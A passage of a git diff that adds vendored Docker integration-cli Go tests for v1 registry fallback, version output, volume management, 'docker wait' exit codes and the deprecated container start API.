operations: +// login, push, pull, build & run +func (s *DockerRegistrySuite) TestV1(c *check.C) { + reg, err := newTestRegistry(c) + c.Assert(err, check.IsNil) + + v2Pings := 0 + reg.registerHandler("/v2/", func(w http.ResponseWriter, r *http.Request) { + v2Pings++ + // V2 ping 404 causes fallback to v1 + w.WriteHeader(404) + }) + + v1Pings := 0 + reg.registerHandler("/v1/_ping", func(w http.ResponseWriter, r *http.Request) { + v1Pings++ + }) + + v1Logins := 0 + reg.registerHandler("/v1/users/", func(w http.ResponseWriter, r *http.Request) { + v1Logins++ + }) + + v1Repo := 0 + reg.registerHandler("/v1/repositories/busybox/", func(w http.ResponseWriter, r *http.Request) { + v1Repo++ + }) + + reg.registerHandler("/v1/repositories/busybox/images", func(w http.ResponseWriter, r *http.Request) { + v1Repo++ + }) + + err = s.d.Start("--insecure-registry", reg.hostport, "--disable-legacy-registry=false") + c.Assert(err, check.IsNil) + + dockerfileName, cleanup, err := makefile(fmt.Sprintf("FROM %s/busybox", reg.hostport)) + c.Assert(err, check.IsNil, check.Commentf("Unable to create test dockerfile")) + defer cleanup() + + s.d.Cmd("build", "--file", dockerfileName, ".") + c.Assert(v1Repo, check.Equals, 1, check.Commentf("Expected v1 repository access after build")) + + repoName := fmt.Sprintf("%s/busybox", reg.hostport) + s.d.Cmd("run", repoName) + c.Assert(v1Repo, check.Equals, 2, check.Commentf("Expected v1 repository access after run")) + + s.d.Cmd("login", "-u", "richard", "-p", "testtest", reg.hostport) + c.Assert(v1Logins, check.Equals, 1, check.Commentf("Expected v1 login attempt")) + + s.d.Cmd("tag", "busybox", repoName) + s.d.Cmd("push", repoName) + + c.Assert(v1Repo, check.Equals, 2) + + s.d.Cmd("pull", repoName) + c.Assert(v1Repo, check.Equals, 3, check.Commentf("Expected v1 repository access after pull")) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go 
b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go new file mode 100644 index 0000000000..7672beb732 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go @@ -0,0 +1,58 @@ +package main + +import ( + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// ensure docker version works +func (s *DockerSuite) TestVersionEnsureSucceeds(c *check.C) { + out, _ := dockerCmd(c, "version") + stringsToCheck := map[string]int{ + "Client:": 1, + "Server:": 1, + " Version:": 2, + " API version:": 2, + " Go version:": 2, + " Git commit:": 2, + " OS/Arch:": 2, + " Built:": 2, + } + + for k, v := range stringsToCheck { + c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out)) + } +} + +// ensure the Windows daemon return the correct platform string +func (s *DockerSuite) TestVersionPlatform_w(c *check.C) { + testRequires(c, DaemonIsWindows) + testVersionPlatform(c, "windows/amd64") +} + +// ensure the Linux daemon return the correct platform string +func (s *DockerSuite) TestVersionPlatform_l(c *check.C) { + testRequires(c, DaemonIsLinux) + testVersionPlatform(c, "linux") +} + +func testVersionPlatform(c *check.C, platform string) { + out, _ := dockerCmd(c, "version") + expected := "OS/Arch: " + platform + + split := strings.Split(out, "\n") + c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split))) + + // Verify the second 'OS/Arch' matches the platform. 
Experimental has + // more lines of output than 'regular' + bFound := false + for i := 14; i < len(split); i++ { + if strings.Contains(split[i], expected) { + bFound = true + break + } + } + c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go new file mode 100644 index 0000000000..61a9413758 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go @@ -0,0 +1,427 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { + dockerCmd(c, "volume", "create") + + _, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver")) + c.Assert(err, check.Not(check.IsNil)) + + // test using hidden --name option + out, _ := dockerCmd(c, "volume", "create", "--name=test") + name := strings.TrimSpace(out) + c.Assert(name, check.Equals, "test") + + out, _ = dockerCmd(c, "volume", "create", "test2") + name = strings.TrimSpace(out) + c.Assert(name, check.Equals, "test2") +} + +func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { + c.Assert( + exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(), + check.Not(check.IsNil), + check.Commentf("volume inspect should error on non-existent volume"), + ) + + out, _ := dockerCmd(c, "volume", "create") + name := strings.TrimSpace(out) + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", name) + c.Assert(strings.TrimSpace(out), check.Equals, name) + + dockerCmd(c, "volume", "create", "test") + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Name }}", "test") + 
c.Assert(strings.TrimSpace(out), check.Equals, "test") +} + +func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) { + dockerCmd(c, "volume", "create", "test1") + dockerCmd(c, "volume", "create", "test2") + dockerCmd(c, "volume", "create", "not-shown") + + result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown") + c.Assert(result, icmd.Matches, icmd.Expected{ + ExitCode: 1, + Err: "No such volume: doesntexist", + }) + + out := result.Stdout() + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out)) + + c.Assert(out, checker.Contains, "test1") + c.Assert(out, checker.Contains, "test2") + c.Assert(out, checker.Not(checker.Contains), "not-shown") +} + +func (s *DockerSuite) TestVolumeCLILs(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "volume", "create", "aaa") + + dockerCmd(c, "volume", "create", "test") + + dockerCmd(c, "volume", "create", "soo") + dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/") + + out, _ := dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + + assertVolList(c, out, []string{"aaa", "soo", "test"}) +} + +func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { + dockerCmd(c, "volume", "create", "aaa") + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", "soo") + + out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"aaa", "soo", "test"} + var names []string + names = append(names, lines...) 
+ c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { + dockerCmd(c, "volume", "create", "aaa") + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", "soo") + + config := `{ + "volumesFormat": "{{ .Name }} default" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "--config", d, "volume", "ls") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + + expected := []string{"aaa default", "soo default", "test default"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) +} + +// assertVolList checks volume retrieved with ls command +// equals to expected volume list +// note: out should be `volume ls [option]` result +func assertVolList(c *check.C, out string, expectVols []string) { + lines := strings.Split(out, "\n") + var volList []string + for _, line := range lines[1 : len(lines)-1] { + volFields := strings.Fields(line) + // wrap all volume name in volList + volList = append(volList, volFields[1]) + } + + // volume ls should contains all expected volumes + c.Assert(volList, checker.DeepEquals, expectVols) +} + +func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + dockerCmd(c, "volume", "create", "testnotinuse1") + dockerCmd(c, "volume", "create", "testisinuse1") + dockerCmd(c, "volume", "create", "testisinuse2") + + // Make sure both "created" (but not started), and started + // containers are included in reference counting + dockerCmd(c, "run", "--name", "volume-test1", "-v", 
"testisinuse1:"+prefix+"/foo", "busybox", "true") + dockerCmd(c, "create", "--name", "volume-test2", "-v", "testisinuse2:"+prefix+"/foo", "busybox", "true") + + out, _ := dockerCmd(c, "volume", "ls") + + // No filter, all volumes should show + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=false") + + // Explicitly disabling dangling + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=true") + + // Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not expected")) + c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=1") + // Filter "dangling" volumes; only "dangling" (unused) volumes should be in the output, dangling also accept 1 + c.Assert(out, checker.Contains, "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, check.Not(checker.Contains), "testisinuse1\n", check.Commentf("volume 'testisinuse1' in output, but not 
expected")) + c.Assert(out, check.Not(checker.Contains), "testisinuse2\n", check.Commentf("volume 'testisinuse2' in output, but not expected")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "dangling=0") + // dangling=0 is same as dangling=false case + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin") + c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) + +} + +func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) { + out, _, err := dockerCmdWithError("volume", "ls", "-f", "FOO=123") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestVolumeCLILsWithIncorrectFilterValue(c *check.C) { + out, _, err := dockerCmdWithError("volume", "ls", "-f", 
"dangling=invalid") + c.Assert(err, check.NotNil) + c.Assert(out, checker.Contains, "Invalid filter") +} + +func (s *DockerSuite) TestVolumeCLIRm(c *check.C) { + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + out, _ := dockerCmd(c, "volume", "create") + id := strings.TrimSpace(out) + + dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "rm", id) + dockerCmd(c, "volume", "rm", "test") + + out, _ = dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) + + volumeID := "testing" + dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar") + out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing")) + c.Assert( + err, + check.Not(check.IsNil), + check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out)) + + out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello") + dockerCmd(c, "rm", "-fv", "test2") + dockerCmd(c, "volume", "inspect", volumeID) + dockerCmd(c, "rm", "-f", "test") + + out, _ = dockerCmd(c, "run", "--name=test2", "-v", volumeID+":"+prefix+"/foo", "busybox", "sh", "-c", "cat /foo/bar") + c.Assert(strings.TrimSpace(out), check.Equals, "hello", check.Commentf("volume data was removed")) + dockerCmd(c, "rm", "test2") + + dockerCmd(c, "volume", "rm", volumeID) + c.Assert( + exec.Command("volume", "rm", "doesntexist").Run(), + check.Not(check.IsNil), + check.Commentf("volume rm should fail with non-existent volume"), + ) +} + +func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { + out, _ := dockerCmd(c, "volume") + // no args should produce the cmd usage output + usage := "Usage: docker volume COMMAND" + c.Assert(out, checker.Contains, usage) + + // invalid arg should error and show the command usage on stderr 
+ _, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg")) + c.Assert(err, check.NotNil, check.Commentf(stderr)) + c.Assert(stderr, checker.Contains, usage) + + // invalid flag should error and show the flag error and cmd usage + _, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag")) + c.Assert(err, check.NotNil, check.Commentf(stderr)) + c.Assert(stderr, checker.Contains, usage) + c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag") +} + +func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) { + out, _ := dockerCmd(c, "volume", "create") + name := strings.TrimSpace(out) + + out, exitCode, err := dockerCmdWithError("volume", "inspect", "--format='{{ .FooBar }}'", name) + c.Assert(err, checker.NotNil, check.Commentf("Output: %s", out)) + c.Assert(exitCode, checker.Equals, 1, check.Commentf("Output: %s", out)) + c.Assert(out, checker.Contains, "Template parsing error") +} + +func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerCmd(c, "volume", "create", "-d", "local", "test", "--opt=type=tmpfs", "--opt=device=tmpfs", "--opt=o=size=1m,uid=1000") + out, _ := dockerCmd(c, "run", "-v", "test:/foo", "busybox", "mount") + + mounts := strings.Split(out, "\n") + var found bool + for _, m := range mounts { + if strings.Contains(m, "/foo") { + found = true + info := strings.Fields(m) + // tmpfs on type tmpfs (rw,relatime,size=1024k,uid=1000) + c.Assert(info[0], checker.Equals, "tmpfs") + c.Assert(info[2], checker.Equals, "/foo") + c.Assert(info[4], checker.Equals, "tmpfs") + c.Assert(info[5], checker.Contains, "uid=1000") + c.Assert(info[5], checker.Contains, "size=1024k") + } + } + c.Assert(found, checker.Equals, true) +} + +func (s *DockerSuite) TestVolumeCLICreateLabel(c *check.C) { + testVol := "testvolcreatelabel" + testLabel := "foo" + testValue := "bar" + + out, _, err := dockerCmdWithError("volume", 
"create", "--label", testLabel+"="+testValue, testVol) + c.Assert(err, check.IsNil) + + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+testLabel+" }}", testVol) + c.Assert(strings.TrimSpace(out), check.Equals, testValue) +} + +func (s *DockerSuite) TestVolumeCLICreateLabelMultiple(c *check.C) { + testVol := "testvolcreatelabel" + + testLabels := map[string]string{ + "foo": "bar", + "baz": "foo", + } + + args := []string{ + "volume", + "create", + testVol, + } + + for k, v := range testLabels { + args = append(args, "--label", k+"="+v) + } + + out, _, err := dockerCmdWithError(args...) + c.Assert(err, check.IsNil) + + for k, v := range testLabels { + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Labels."+k+" }}", testVol) + c.Assert(strings.TrimSpace(out), check.Equals, v) + } +} + +func (s *DockerSuite) TestVolumeCLILsFilterLabels(c *check.C) { + testVol1 := "testvolcreatelabel-1" + out, _, err := dockerCmdWithError("volume", "create", "--label", "foo=bar1", testVol1) + c.Assert(err, check.IsNil) + + testVol2 := "testvolcreatelabel-2" + out, _, err = dockerCmdWithError("volume", "create", "--label", "foo=bar2", testVol2) + c.Assert(err, check.IsNil) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo") + + // filter with label=key + c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output")) + c.Assert(out, checker.Contains, "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2' in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=bar1") + + // filter with label=key=value + c.Assert(out, checker.Contains, "testvolcreatelabel-1\n", check.Commentf("expected volume 'testvolcreatelabel-1' in output")) + c.Assert(out, check.Not(checker.Contains), "testvolcreatelabel-2\n", check.Commentf("expected volume 'testvolcreatelabel-2 in output")) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=non-exist") + 
outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + out, _ = dockerCmd(c, "volume", "ls", "--filter", "label=foo=non-exist") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) +} + +func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) { + out, _ := dockerCmd(c, "volume", "create") + id := strings.TrimSpace(out) + + dockerCmd(c, "volume", "rm", "-f", id) + dockerCmd(c, "volume", "rm", "--force", "nonexist") + + out, _ = dockerCmd(c, "volume", "ls") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) +} + +func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + name := "test" + out, _ := dockerCmd(c, "volume", "create", name) + id := strings.TrimSpace(out) + c.Assert(id, checker.Equals, name) + + out, _ = dockerCmd(c, "volume", "inspect", "--format", "{{.Mountpoint}}", name) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + // Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data` + path := strings.TrimSuffix(strings.TrimSpace(out), "/_data") + out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path)) + c.Assert(err, check.IsNil) + + dockerCmd(c, "volume", "rm", "-f", "test") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Not(checker.Contains), name) + dockerCmd(c, "volume", "create", "test") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) +} + +func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Without options + name := "test1" + dockerCmd(c, "volume", "create", "-d", "local", name) + out, _ := dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name) + c.Assert(strings.TrimSpace(out), checker.Contains, "map[]") 
+ + // With options + name = "test2" + k1, v1 := "type", "tmpfs" + k2, v2 := "device", "tmpfs" + k3, v3 := "o", "size=1m,uid=1000" + dockerCmd(c, "volume", "create", "-d", "local", name, "--opt", fmt.Sprintf("%s=%s", k1, v1), "--opt", fmt.Sprintf("%s=%s", k2, v2), "--opt", fmt.Sprintf("%s=%s", k3, v3)) + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Options }}", name) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k1, v1)) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2)) + c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go new file mode 100644 index 0000000000..961aef5525 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go @@ -0,0 +1,97 @@ +package main + +import ( + "bytes" + "os/exec" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// non-blocking wait with 0 exit code +func (s *DockerSuite) TestWaitNonBlockedExitZero(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "true") + containerID := strings.TrimSpace(out) + + err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second) + c.Assert(err, checker.IsNil) //Container should have stopped by now + + out, _ = dockerCmd(c, "wait", containerID) + c.Assert(strings.TrimSpace(out), checker.Equals, "0", check.Commentf("failed to set up container, %v", out)) + +} + +// blocking wait with 0 exit code +func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) { + // Windows busybox does not support trap in this way, not sleep with sub-second + // granularity. It will always exit 0x40010004. 
+ testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 0' TERM; while true; do usleep 10; done") + containerID := strings.TrimSpace(out) + + c.Assert(waitRun(containerID), checker.IsNil) + + chWait := make(chan string) + go func() { + chWait <- "" + out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID)) + chWait <- out + }() + + <-chWait // make sure the goroutine is started + time.Sleep(100 * time.Millisecond) + dockerCmd(c, "stop", containerID) + + select { + case status := <-chWait: + c.Assert(strings.TrimSpace(status), checker.Equals, "0", check.Commentf("expected exit 0, got %s", status)) + case <-time.After(2 * time.Second): + c.Fatal("timeout waiting for `docker wait` to exit") + } + +} + +// non-blocking wait with random exit code +func (s *DockerSuite) TestWaitNonBlockedExitRandom(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "exit 99") + containerID := strings.TrimSpace(out) + + err := waitInspect(containerID, "{{.State.Running}}", "false", 30*time.Second) + c.Assert(err, checker.IsNil) //Container should have stopped by now + out, _ = dockerCmd(c, "wait", containerID) + c.Assert(strings.TrimSpace(out), checker.Equals, "99", check.Commentf("failed to set up container, %v", out)) + +} + +// blocking wait with random exit code +func (s *DockerSuite) TestWaitBlockedExitRandom(c *check.C) { + // Cannot run on Windows as trap in Windows busybox does not support trap in this way. 
+ testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "trap 'exit 99' TERM; while true; do usleep 10; done") + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + chWait := make(chan error) + waitCmd := exec.Command(dockerBinary, "wait", containerID) + waitCmdOut := bytes.NewBuffer(nil) + waitCmd.Stdout = waitCmdOut + c.Assert(waitCmd.Start(), checker.IsNil) + go func() { + chWait <- waitCmd.Wait() + }() + + dockerCmd(c, "stop", containerID) + + select { + case err := <-chWait: + c.Assert(err, checker.IsNil, check.Commentf(waitCmdOut.String())) + status, err := waitCmdOut.ReadString('\n') + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(status), checker.Equals, "99", check.Commentf("expected exit 99, got %s", status)) + case <-time.After(2 * time.Second): + waitCmd.Process.Kill() + c.Fatal("timeout waiting for `docker wait` to exit") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go new file mode 100644 index 0000000000..7bc287eca7 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go @@ -0,0 +1,227 @@ +// This file will be removed when we completely drop support for +// passing HostConfig to container start API. 
+ +package main + +import ( + "net/http" + "strings" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func formatV123StartAPIURL(url string) string { + return "/v1.23" + url +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) { + name := "test-deprecated-api-124" + dockerCmd(c, "create", "--name", name, "busybox") + config := map[string]interface{}{ + "Binds": []string{"/aa:/bb"}, + } + status, body, err := sockRequest("POST", "/containers/"+name+"/start", config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusBadRequest) + c.Assert(string(body), checker.Contains, "was deprecated since v1.10") +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { + // TODO Windows CI: Investigate further why this fails on Windows to Windows CI. + testRequires(c, DaemonIsLinux) + path := "/foo" + if daemonPlatform == "windows" { + path = `c:\foo` + } + name := "testing" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{path: {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + bindPath := randomTmpDirPath("test", daemonPlatform) + config = map[string]interface{}{ + "Binds": []string{bindPath + ":" + path}, + } + status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pth, err := inspectMountSourceField(name, path) + c.Assert(err, checker.IsNil) + c.Assert(pth, checker.Equals, bindPath, check.Commentf("expected volume host path to be %s, got %s", bindPath, pth)) +} + +// Test for GH#10618 +func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, 
DaemonIsLinux) + name := "testdups" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + bindPath1 := randomTmpDirPath("test1", daemonPlatform) + bindPath2 := randomTmpDirPath("test2", daemonPlatform) + + config = map[string]interface{}{ + "Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"}, + } + status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err)) +} + +func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, DaemonIsLinux) + volName := "voltst" + volPath := "/tmp" + + dockerCmd(c, "run", "--name", volName, "-v", volPath, "busybox") + + name := "TestContainerAPIStartVolumesFrom" + config := map[string]interface{}{ + "Image": "busybox", + "Volumes": map[string]struct{}{volPath: {}}, + } + + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusCreated) + + config = map[string]interface{}{ + "VolumesFrom": []string{volName}, + } + status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + pth, err := inspectMountSourceField(name, volPath) + c.Assert(err, checker.IsNil) + pth2, err := inspectMountSourceField(volName, volPath) + c.Assert(err, 
checker.IsNil) + c.Assert(pth, checker.Equals, pth2, check.Commentf("expected volume host path to be %s, got %s", pth, pth2)) +} + +// #9981 - Allow a docker created volume (ie, one in /var/lib/docker/volumes) to be used to overwrite (via passing in Binds on api start) an existing volume +func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) { + // TODO Windows to Windows CI - Port this + testRequires(c, DaemonIsLinux) + dockerCmd(c, "create", "-v", "/foo", "--name=one", "busybox") + + fooDir, err := inspectMountSourceField("one", "/foo") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox") + + bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}} + status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNoContent) + + fooDir2, err := inspectMountSourceField("two", "/foo") + c.Assert(err, checker.IsNil) + c.Assert(fooDir2, checker.Equals, fooDir, check.Commentf("expected volume path to be %s, got: %s", fooDir, fooDir2)) +} + +func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) { + // TODO Windows: Port once memory is supported + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "create", "busybox") + + containerID := strings.TrimSpace(out) + + config := `{ + "CpuShares": 100, + "Memory": 524287 + }` + + res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + c.Assert(err, 